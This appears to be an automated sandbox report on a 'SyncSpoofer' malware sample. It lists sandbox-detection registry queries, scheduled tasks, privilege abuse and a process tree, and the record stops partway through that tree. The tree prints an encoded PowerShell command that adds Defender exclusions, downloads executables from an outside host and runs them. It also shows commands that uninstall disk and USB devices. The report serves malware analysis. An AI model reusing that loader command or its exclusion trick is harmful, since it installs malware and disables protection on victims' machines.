zgrat | 9a88596ac17ead66f77f50ff112c5a7d6def53fb92e218471ec41edaebf5b14b

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe

Maps connected drives based on registry 3 TTPs 14 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2912	SyncSpoofer.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1652	sc.exe
2864	sc.exe
1492	sc.exe
2652	sc.exe
1312	sc.exe
1700	sc.exe
2576	sc.exe
1804	sc.exe
2800	sc.exe
1688	sc.exe
1740	sc.exe
2448	sc.exe
2104	sc.exe
2568	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 52 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
1748	schtasks.exe
856	schtasks.exe
692	schtasks.exe
2408	schtasks.exe
2816	schtasks.exe
1692	schtasks.exe
2936	schtasks.exe
1708	schtasks.exe
812	schtasks.exe
2856	schtasks.exe
3028	schtasks.exe
1768	schtasks.exe
2984	schtasks.exe
1924	schtasks.exe
3036	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2496	7zFM.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2496	7zFM.exe
2496	7zFM.exe
3016	DevManView.exe
1244	DevManView.exe
1564	DevManView.exe
1508	DevManView.exe
1304	DevManView.exe
2796	DevManView.exe
1152	DevManView.exe
1476	DevManView.exe
1032	DevManView.exe
1732	DevManView.exe
1264	DevManView.exe
1492	DevManView.exe
1200	DevManView.exe
960	DevManView.exe
1560	DevManView.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2496	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2496	7zFM.exe
Token: 35	2496	7zFM.exe
Token: SeSecurityPrivilege	2496	7zFM.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeBackupPrivilege	3016	DevManView.exe
Token: SeBackupPrivilege	1244	DevManView.exe
Token: SeBackupPrivilege	1564	DevManView.exe
Token: SeBackupPrivilege	1508	DevManView.exe
Token: SeBackupPrivilege	1304	DevManView.exe
Token: SeRestorePrivilege	3016	DevManView.exe
Token: SeRestorePrivilege	1244	DevManView.exe
Token: SeRestorePrivilege	1564	DevManView.exe
Token: SeRestorePrivilege	1508	DevManView.exe
Token: SeRestorePrivilege	1304	DevManView.exe
Token: SeTakeOwnershipPrivilege	3016	DevManView.exe
Token: SeTakeOwnershipPrivilege	1244	DevManView.exe
Token: SeTakeOwnershipPrivilege	1564	DevManView.exe
Token: SeTakeOwnershipPrivilege	1508	DevManView.exe
Token: SeTakeOwnershipPrivilege	1304	DevManView.exe
Token: SeImpersonatePrivilege	1244	DevManView.exe
Token: SeImpersonatePrivilege	1564	DevManView.exe
Token: SeImpersonatePrivilege	1508	DevManView.exe
Token: SeImpersonatePrivilege	3016	DevManView.exe
Token: SeImpersonatePrivilege	1304	DevManView.exe
Token: SeBackupPrivilege	1476	DevManView.exe
Token: SeRestorePrivilege	1476	DevManView.exe
Token: SeTakeOwnershipPrivilege	1476	DevManView.exe
Token: SeBackupPrivilege	1032	DevManView.exe
Token: SeBackupPrivilege	1152	DevManView.exe
Token: SeBackupPrivilege	1732	DevManView.exe
Token: SeBackupPrivilege	1264	DevManView.exe
Token: SeBackupPrivilege	1492	DevManView.exe
Token: SeRestorePrivilege	1032	DevManView.exe
Token: SeRestorePrivilege	1152	DevManView.exe
Token: SeRestorePrivilege	1732	DevManView.exe
Token: SeRestorePrivilege	1264	DevManView.exe
Token: SeRestorePrivilege	1492	DevManView.exe
Token: SeTakeOwnershipPrivilege	1032	DevManView.exe
Token: SeTakeOwnershipPrivilege	1152	DevManView.exe
Token: SeTakeOwnershipPrivilege	1732	DevManView.exe
Token: SeTakeOwnershipPrivilege	1264	DevManView.exe
Token: SeTakeOwnershipPrivilege	1492	DevManView.exe
Token: SeBackupPrivilege	1200	DevManView.exe
Token: SeBackupPrivilege	960	DevManView.exe
Token: SeBackupPrivilege	2796	DevManView.exe
Token: SeRestorePrivilege	1200	DevManView.exe
Token: SeRestorePrivilege	960	DevManView.exe
Token: SeRestorePrivilege	2796	DevManView.exe
Token: SeTakeOwnershipPrivilege	1200	DevManView.exe
Token: SeTakeOwnershipPrivilege	960	DevManView.exe
Token: SeTakeOwnershipPrivilege	2796	DevManView.exe
Token: SeImpersonatePrivilege	1152	DevManView.exe
Token: SeImpersonatePrivilege	1476	DevManView.exe
Token: SeImpersonatePrivilege	2796	DevManView.exe
Token: SeImpersonatePrivilege	1264	DevManView.exe
Token: SeImpersonatePrivilege	1732	DevManView.exe
Token: SeImpersonatePrivilege	1492	DevManView.exe
Token: SeImpersonatePrivilege	1200	DevManView.exe
Token: SeImpersonatePrivilege	960	DevManView.exe
Token: SeBackupPrivilege	1560	DevManView.exe
Token: SeRestorePrivilege	1560	DevManView.exe
Token: SeTakeOwnershipPrivilege	1560	DevManView.exe
Token: SeImpersonatePrivilege	1560	DevManView.exe
Token: SeImpersonatePrivilege	1032	DevManView.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2496	7zFM.exe
2496	7zFM.exe
2496	7zFM.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2912	SyncSpoofer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 2496	2696	cmd.exe	29
PID 2696 wrote to memory of 2496	2696	cmd.exe	29
PID 2696 wrote to memory of 2496	2696	cmd.exe	29
PID 2496 wrote to memory of 2912	2496	7zFM.exe	30
PID 2496 wrote to memory of 2912	2496	7zFM.exe	30
PID 2496 wrote to memory of 2912	2496	7zFM.exe	30
PID 2496 wrote to memory of 2912	2496	7zFM.exe	30
PID 2912 wrote to memory of 2528	2912	SyncSpoofer.exe	31
PID 2912 wrote to memory of 2528	2912	SyncSpoofer.exe	31
PID 2912 wrote to memory of 2528	2912	SyncSpoofer.exe	31
PID 2912 wrote to memory of 2528	2912	SyncSpoofer.exe	31
PID 2528 wrote to memory of 1976	2528	powershell.exe	33
PID 2528 wrote to memory of 1976	2528	powershell.exe	33
PID 2528 wrote to memory of 1976	2528	powershell.exe	33
PID 2528 wrote to memory of 1976	2528	powershell.exe	33
PID 2528 wrote to memory of 2184	2528	powershell.exe	35
PID 2528 wrote to memory of 2184	2528	powershell.exe	35
PID 2528 wrote to memory of 2184	2528	powershell.exe	35
PID 2528 wrote to memory of 2184	2528	powershell.exe	35
PID 2528 wrote to memory of 2040	2528	powershell.exe	36
PID 2528 wrote to memory of 2040	2528	powershell.exe	36
PID 2528 wrote to memory of 2040	2528	powershell.exe	36
PID 2528 wrote to memory of 2040	2528	powershell.exe	36
PID 1976 wrote to memory of 2224	1976	HpsrSpoof.exe	37
PID 1976 wrote to memory of 2224	1976	HpsrSpoof.exe	37
PID 1976 wrote to memory of 2224	1976	HpsrSpoof.exe	37
PID 2224 wrote to memory of 1636	2224	cmd.exe	39
PID 2224 wrote to memory of 1636	2224	cmd.exe	39
PID 2224 wrote to memory of 1636	2224	cmd.exe	39
PID 2184 wrote to memory of 2684	2184	sphyperRuntimedhcpSvc.exe	40
PID 2184 wrote to memory of 2684	2184	sphyperRuntimedhcpSvc.exe	40
PID 2184 wrote to memory of 2684	2184	sphyperRuntimedhcpSvc.exe	40
PID 2184 wrote to memory of 2684	2184	sphyperRuntimedhcpSvc.exe	40
PID 1976 wrote to memory of 1832	1976	HpsrSpoof.exe	43
PID 1976 wrote to memory of 1832	1976	HpsrSpoof.exe	43
PID 1976 wrote to memory of 1832	1976	HpsrSpoof.exe	43
PID 1832 wrote to memory of 1032	1832	cmd.exe	45
PID 1832 wrote to memory of 1032	1832	cmd.exe	45
PID 1832 wrote to memory of 1032	1832	cmd.exe	45
PID 1832 wrote to memory of 3016	1832	cmd.exe	109
PID 1832 wrote to memory of 3016	1832	cmd.exe	109
PID 1832 wrote to memory of 3016	1832	cmd.exe	109
PID 1832 wrote to memory of 1152	1832	cmd.exe	47
PID 1832 wrote to memory of 1152	1832	cmd.exe	47
PID 1832 wrote to memory of 1152	1832	cmd.exe	47
PID 1832 wrote to memory of 1244	1832	cmd.exe	48
PID 1832 wrote to memory of 1244	1832	cmd.exe	48
PID 1832 wrote to memory of 1244	1832	cmd.exe	48
PID 1832 wrote to memory of 1264	1832	cmd.exe	49
PID 1832 wrote to memory of 1264	1832	cmd.exe	49
PID 1832 wrote to memory of 1264	1832	cmd.exe	49
PID 1832 wrote to memory of 1564	1832	cmd.exe	50
PID 1832 wrote to memory of 1564	1832	cmd.exe	50
PID 1832 wrote to memory of 1564	1832	cmd.exe	50
PID 1832 wrote to memory of 1732	1832	cmd.exe	51
PID 1832 wrote to memory of 1732	1832	cmd.exe	51
PID 1832 wrote to memory of 1732	1832	cmd.exe	51
PID 1832 wrote to memory of 1508	1832	cmd.exe	52
PID 1832 wrote to memory of 1508	1832	cmd.exe	52
PID 1832 wrote to memory of 1508	1832	cmd.exe	52
PID 1832 wrote to memory of 1492	1832	cmd.exe	53
PID 1832 wrote to memory of 1492	1832	cmd.exe	53
PID 1832 wrote to memory of 1492	1832	cmd.exe	53
PID 1832 wrote to memory of 1304	1832	cmd.exe	54

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SyncSpoof Updated.rar"
1⤵
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SyncSpoof Updated.rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Users\Admin\AppData\Local\Temp\7zO0C9721B6\SyncSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0C9721B6\SyncSpoofer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYgBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZgBoAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZwBsAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBnAHUAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAeQB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAZQBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHoAagBuACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG0AYQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBhAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgB4AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAeABzAGgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGQAcwBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBhAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBxAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwByAGwAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHoAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQBrAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAHMAaABkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAGwAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAawBuAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaAB3AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAegB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAHMAZgBoACMAPgA="
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2528
    - - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: BU1N-003V
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2224
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: BU1N-003V
        7⤵
        Executes dropped EXE
        
        PID:1636
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1832
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:960
        
        C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
